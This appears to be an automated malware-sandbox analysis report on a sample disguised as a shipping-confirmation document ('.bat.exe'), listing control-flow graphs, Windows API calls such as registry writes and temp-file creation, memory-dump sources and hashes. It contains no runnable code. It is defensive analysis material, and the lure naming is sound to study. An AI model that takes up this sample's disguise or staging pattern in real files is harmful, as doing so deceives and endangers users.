                                                                            control_flow_graph 559 733b1817-733b1856 call 733b1bff 563 733b185c-733b1860 559->563 564 733b1976-733b1978 559->564 565 733b1869-733b1876 call 733b2480 563->565 566 733b1862-733b1868 call 733b243e 563->566 571 733b1878-733b187d 565->571 572 733b18a6-733b18ad 565->572 566->565 575 733b1898-733b189b 571->575 576 733b187f-733b1880 571->576 573 733b18af-733b18cb call 733b2655 call 733b1654 call 733b1312 GlobalFree 572->573 574 733b18cd-733b18d1 572->574 600 733b1925-733b1929 573->600 577 733b191e-733b1924 call 733b2655 574->577 578 733b18d3-733b191c call 733b1666 call 733b2655 574->578 575->572 579 733b189d-733b189e call 733b2e23 575->579 581 733b1888-733b1889 call 733b2b98 576->581 582 733b1882-733b1883 576->582 577->600 578->600 594 733b18a3 579->594 591 733b188e 581->591 583 733b1890-733b1896 call 733b2810 582->583 584 733b1885-733b1886 582->584 599 733b18a5 583->599 584->572 584->581 591->594 594->599 599->572 603 733b192b-733b1939 call 733b2618 600->603 604 733b1966-733b196d 600->604 609 733b193b-733b193e 603->609 610 733b1951-733b1958 603->610 604->564 606 733b196f-733b1970 GlobalFree 604->606 606->564 609->610 611 733b1940-733b1948 609->611 610->604 612 733b195a-733b1965 call 733b15dd 610->612 611->610 613 733b194a-733b194b FreeLibrary 611->613 612->604 613->610
                                                                            APIs
                                                                              • Part of subcall function 733B1BFF: GlobalFree.KERNEL32(?), ref: 733B1E74
                                                                              • Part of subcall function 733B1BFF: GlobalFree.KERNEL32(?), ref: 733B1E79
                                                                              • Part of subcall function 733B1BFF: GlobalFree.KERNEL32(?), ref: 733B1E7E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 733B18C5
                                                                            • FreeLibrary.KERNEL32(?), ref: 733B194B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 733B1970
                                                                              • Part of subcall function 733B243E: GlobalAlloc.KERNEL32(00000040,?), ref: 733B246F
                                                                              • Part of subcall function 733B2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,733B1896,00000000), ref: 733B28E0
                                                                              • Part of subcall function 733B1666: wsprintfW.USER32 ref: 733B1694
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                            • String ID:
                                                                            • API String ID: 3962662361-3916222277
                                                                            • Opcode ID: e798f0f8bdade1856ab723bb090272bd60e5dc2c88e5a6cf1674be0e48db0d7c
                                                                            • Instruction ID: d7355f2e343b16fa8a4b6dded15b8b33cd4650a67fe7f8cf9d8d132d2fa06ef9
                                                                            • Opcode Fuzzy Hash: e798f0f8bdade1856ab723bb090272bd60e5dc2c88e5a6cf1674be0e48db0d7c
                                                                            • Instruction Fuzzy Hash: C241BF72D003899BEB319F20DC84F8537BEBF05351F184569E94BDA8CADBBC818587A0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 616 40347e-4034a6 GetTickCount 617 4035d6-4035de call 403033 616->617 618 4034ac-4034d7 call 4035fd SetFilePointer 616->618 623 4035e0-4035e4 617->623 624 4034dc-4034ee 618->624 625 4034f0 624->625 626 4034f2-403500 call 4035e7 624->626 625->626 629 403506-403512 626->629 630 4035c8-4035cb 626->630 631 403518-40351e 629->631 630->623 632 403520-403526 631->632 633 403549-403565 call 406bf1 631->633 632->633 634 403528-403548 call 403033 632->634 639 4035d1 633->639 640 403567-40356f 633->640 634->633 643 4035d3-4035d4 639->643 641 403571-403579 call 406224 640->641 642 403592-403598 640->642 646 40357e-403580 641->646 642->639 645 40359a-40359c 642->645 643->623 645->639 647 40359e-4035b1 645->647 648 403582-40358e 646->648 649 4035cd-4035cf 646->649 647->624 650 4035b7-4035c6 SetFilePointer 647->650 648->631 651 403590 648->651 649->643 650->617 651->647
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00403492
                                                                              • Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
                                                                            • SetFilePointer.KERNELBASE(00129FEB,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer$CountTick
                                                                            • String ID: O
                                                                            • API String ID: 1092082344-3926687730
                                                                            • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                                            • Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
                                                                            • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                                            • Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 652 401c48-401c68 call 402d89 * 2 657 401c74-401c78 652->657 658 401c6a-401c71 call 402dab 652->658 660 401c84-401c8a 657->660 661 401c7a-401c81 call 402dab 657->661 658->657 664 401cd8-401d02 call 402dab * 2 FindWindowExW 660->664 665 401c8c-401ca8 call 402d89 * 2 660->665 661->660 677 401d08 664->677 675 401cc8-401cd6 SendMessageW 665->675 676 401caa-401cc6 SendMessageTimeoutW 665->676 675->677 678 401d0b-401d0e 676->678 677->678 679 401d14 678->679 680 402c2f-402c3e 678->680 679->680
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                                            • Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
                                                                            • Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                                            • Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 683 40248f-4024b6 call 402dab * 2 call 402e3b 689 4024bb-4024c0 683->689 690 4024c6-4024d0 689->690 691 402c2f-402c3e 689->691 692 4024d2-4024df call 402dab lstrlenW 690->692 693 4024e3-4024e6 690->693 692->693 697 4024e8-4024f9 call 402d89 693->697 698 4024fa-4024fd 693->698 697->698 699 40250e-402522 RegSetValueExW 698->699 700 4024ff-402509 call 403376 698->700 704 402524 699->704 705 402527-402608 RegCloseKey 699->705 700->699 704->705 705->691
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,00000011,00000002), ref: 00402602
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValuelstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp
                                                                            • API String ID: 2655323295-247911329
                                                                            • Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                                            • Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
                                                                            • Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                                            • Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 708 4061a1-4061ad 709 4061ae-4061e2 GetTickCount GetTempFileNameW 708->709 710 4061f1-4061f3 709->710 711 4061e4-4061e6 709->711 712 4061eb-4061ee 710->712 711->709 713 4061e8 711->713 713->712
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004061BF
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-678247507
                                                                            • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                            • Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
                                                                            • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                            • Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764
                                                                            APIs
                                                                              • Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 0040600A
                                                                              • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                                              • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                              • Part of subcall function 00405BD6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\eftermodnendes\ringeagt,?,00000000,000000F0), ref: 00401652
                                                                            Strings
                                                                            • C:\Users\user\eftermodnendes\ringeagt, xrefs: 00401645
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID: C:\Users\user\eftermodnendes\ringeagt
                                                                            • API String ID: 1892508949-1820855999
                                                                            • Opcode ID: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
                                                                            • Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
                                                                            • Opcode Fuzzy Hash: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
                                                                            • Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                                            • Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
                                                                            • Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                                            • Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                                            • Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
                                                                            • Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                                            • Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                                            • Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
                                                                            • Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                                            • Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                                            • Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
                                                                            • Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                                            • Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                                            • Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
                                                                            • Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                                            • Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
